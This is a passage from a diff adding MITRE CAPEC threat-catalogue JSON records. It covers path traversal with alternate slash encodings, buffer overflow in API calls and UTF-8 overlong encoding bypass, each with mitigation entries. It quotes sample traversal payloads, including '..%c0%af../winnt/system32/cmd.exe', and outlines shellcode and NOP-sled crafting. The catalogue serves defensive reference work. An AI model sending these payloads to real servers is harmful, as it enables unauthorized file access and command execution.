"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Slashes in Alternate Encodings\n The two following requests are equivalent on most Web servers:\n http://target server/some_directory\\..\\..\\..\\winnt\n is equivalent to\n http://target server/some_directory/../../../winnt\n Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. Consider the strings\n http://target server/some_directory\\..%5C..%5C..\\winnt\n where %5C is equivalent to the \\ character.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and looks for areas where user input is used to access resources on the target host. The adversary attempts different encodings of slash characters to bypass input filters.

    2. Techniques
    Try both backslash and forward slash characters
    Try different encodings for slash characters such as %5C

Exploit

  1. Traverse application directories: Once the adversary determines how to bypass filters that filter out slash characters, they will manipulate the user input to include slashes in order to traverse directories and access resources that are not intended for the user.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application server accepts paths to locate resources.", + "The application server does insufficient input data validation on the resource path requested by the user.", + "The access right to resources are not set properly." + ], + "x_capec_skills_required": { + "Low": "An adversary can try variation of the slashes characters.", + "Medium": "An adversary can use more sophisticated tool or script to scan a website and find a path filtering problem." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL.", + "id": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a6ee85d-1fc3-4c89-a197-b17473b215bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)", + "id": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70f70a7f-5a5f-479e-ba10-554afaad269a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77731bb0-70b0-41b9-8671-78db70983fae", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test your path decoding process against malicious input.", + "id": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a701d96e-611d-4d01-988e-216e7c28a1a3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83e41edb-f3d5-444b-b2a9-55f1329f2b68", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the application based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d18cc586-8a23-43d4-b493-6352b03b104a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. This has a very broad effect on security across a system, usually affecting more than one software process.", + "external_references": [ + { + "external_id": "CAPEC-8", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/8.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in an API Call", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Libc in FreeBSD\n A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once.\n ", + "\n Xtlib\n A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these.

Experiment

  1. Find injection vector: The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.

    2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.

  2. Craft overflow content: The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes an API to the user.", + "One or more API functions exposed by the target host has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1904d522-3156-4b2b-8861-ea295dd3490b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--948df80a-6252-4723-93a8-9c5b1a9daa17", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fdeab-0159-4aa3-aed5-3de1e3f31e4a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23598190-f719-4176-baf5-1e00d32e9cec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa5f5375-154b-486b-a60c-7eadb33e0a4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.", + "external_references": [ + { + "external_id": "CAPEC-80", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/80.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-112", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html" + }, + { + "description": "Michael Howard, David LeBlanc, Writing Secure Code, Microsoft Press", + "external_id": "REF-530", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Bruce Schneier, Security Risks of Unicode, Crypto-Gram Newsletter, 2000--07---15", + "external_id": "REF-531", + "source_name": "reference_from_CAPEC", + "url": "https://www.schneier.com/crypto-gram/archives/2000/0715.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-532", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/UTF-8" + }, + { + "description": "F. Yergeau, RFC 3629 - UTF-8, a transformation format of ISO 10646, 2003--11", + "external_id": "REF-533", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc3629.html" + }, + { + "description": "Eric Hacker, IDS Evasion with Unicode, 2001--01---03", + "external_id": "REF-114", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1232" + }, + { + "description": "Corrigendum #1: UTF-8 Shortest Form, The Unicode Standard, 2001--03, Unicode, Inc.", + "external_id": "REF-535", + "source_name": "reference_from_CAPEC", + "url": "http://www.unicode.org/versions/corrigendum1.html" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Markus Kuhn, UTF-8 decoder capability and stress test, 2003--02---19", + "external_id": "REF-537", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt" + } + ], + "id": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using UTF-8 Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this\n http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe\n the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.\n So when the attacker requested the tainted URL, they accessed\n http://servername/scripts/../../winnt/system32/cmd.exe\n In other words, they walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where they could pass commands to the command shell, Cmd.exe.See also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various UTF-8 encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Try to use UTF-8 encoding of content in Scripts in order to bypass validation routines.
    Try to use UTF-8 encoding of content in HTML in order to bypass validation routines.
    Try to use UTF-8 encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770" + ], + "x_capec_prerequisites": [ + "The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.", + "Input filtering and validating is not done properly leaving the door open to harmful characters for the target host." + ], + "x_capec_skills_required": { + "Low": "An attacker can inject different representation of a filtered character in UTF-8 format.", + "Medium": "An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters.", + "id": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04696e3f-623a-46fd-bd0e-c253d001cba3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb143d8a-cf0a-4047-99fb-e6c8751f522b", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ", + "id": "course-of-action--4494e6e5-ca13-4533-8fe6-0a188984a0ec", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67dc12df-3835-4e03-aa36-46e8bff6aeca", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4494e6e5-ca13-4533-8fe6-0a188984a0ec", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).", + "id": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9116b922-43a0-4491-8306-52e2c12b1dbf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2984b19d-0e72-4ebb-abaa-04953b80dbe3", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section)", + "id": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-80-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ec596d0-6f5a-467d-b542-5bcad89fb1d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9b22e6b-a3b6-4d0c-9522-c3b147e28de5", + "target_ref": "attack-pattern--2f463f26-84b9-4ab2-9b98-63c817fb3497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 